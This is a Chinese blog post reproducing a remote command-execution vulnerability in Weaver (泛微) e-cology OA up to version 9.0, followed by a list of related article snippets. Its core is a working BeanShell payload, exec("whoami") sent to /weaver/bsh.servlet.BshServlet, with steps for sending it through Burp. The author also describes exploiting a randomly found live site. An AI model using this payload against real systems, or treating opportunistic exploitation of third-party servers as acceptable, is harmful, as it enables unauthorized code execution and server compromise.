记一次对泛微OA命令执行复现

2024-06-04 06:25:54

最近圈子也是被泛微OA命令执行刷爆了。周一上班划水ing，想着来复现一下，顺便更新下博客。运气好随便搜索了一个就存在漏洞

0x01漏洞描述

泛微OA办公系统是一款协调办公软件。

泛微协同商务软件系统存在命令执行漏洞，攻击者可利用该漏洞获取服务器权限。

0x02漏洞危害

攻击者可以通过精心构造的请求包在受影响版本的泛微OA上进行远程代码执行。

0x03影响范围

泛微 e-cology<=9.0

0x04漏洞复现

漏洞路径: /weaver/bsh.servlet.BshServlet

poc:bsh.script=exec("whoami");&bsh.servlet.captureOutErr=true& bsh.servlet.output=raw&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw

访问该站域名加上漏洞路径如果存在，就有漏洞

访问后显示这样，点击按钮提交，神器burp抓包。将post内容替换先前的poc

bsh.script=exec("whoami");&bsh.servlet.captureOutErr=true& bsh.servlet.output=raw&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw

发送

成功复现

记一次对泛微OA命令执行复现相关推荐

泛微OA节点执行接口实现
泛微OA节点执行接口实现该接口主要实现在流程的流转当中,实时通过自定义的动作去操作异构系统的数据或者处理其他一些特定的业务,在流程的节点后.出口和节点前都可以定义这样的自定义动作. 1. 接口实现方 ...
泛微OA系统多版本存在命令执行漏洞
0x01漏洞描述泛微OA办公系统是一款协调办公软件. 泛微协同商务软件系统存在命令执行漏洞,攻击者可利用该漏洞获取服务器权限. 0x02漏洞危害攻击者可以通过精心构造的请求包在受影响版本的泛微OA ...
【文档留存】泛微OA POC
泛微OA &&POC 泛微OA 多版本存在命令执行 POC&EXP来源于网络漏洞描述: 泛微e-cology OA系统的J**A Beanshell接口可被未授权访问,攻击者 ...
泛微软件服务器是多少,泛微oa云服务器要求
泛微oa云服务器要求内容精选换一换简要介绍Rsyslog是一个集中日志管理工具,基于流行的服务端/客户端模式,通过TCP或者UDP传输协议来发送日志信息,或者从网络设备.服务器.路由器.交换机. ...
Android安卓-泛微OA Emobile7自动打卡
Android安卓-泛微OA Emobile7自动打卡 Emobile 公司使用背景 UI自动化环境搭建 adb常用命令查询当前设备多个设备之间切换查询包名启动名 UI自动化appium代码基 ...
漏洞复现泛微OA E-Cology V9 browser.jsp SQL注入漏洞
漏洞复现泛微OA E-Cology V9 browser.jsp SQL注入漏洞漏洞描述泛微新一代移动办公平台e-cology不仅组织提供了一体化的协同工作平台,将组织事务逐渐实现全程电子化,改 ...
webservice python开发接口_基于Python的Webservice开发(四)-泛微OA的SOAP接口
一.功能需求泛微e-cology可以在流程中调用Webservice接口实现与其他系统的联动等复杂功能.但是目前泛微文档中仅提供了调用的方法,但是没有关于接口的相关开发信息. 本次案例是用Pytho ...
泛微oa系统什么框架_泛微移动办公OA系统走进江苏国曜信息科技有限公司
近日,泛微凭借以"简单高效"为核心的协同OA办公系统与江苏国曜信息科技有限公司成功合作,泛微将助力企业信息化建设,促进其管理水平的迅速提升.江苏国曜信息科技有限公司成立于2018年 ...
泛微OA二次开发E8之UE富文本编辑器增加按钮操作
泛微OA协同办公系统在这里就不多作描述,有需要的可自行了解. 现在说说我遇到的问题以及解决方案. 遇到的需求问题公司有自己的文件存储服务器,所以想把图片上传和文件上传都传输到自己的服务器上,所以需要 ...

最新文章

热门文章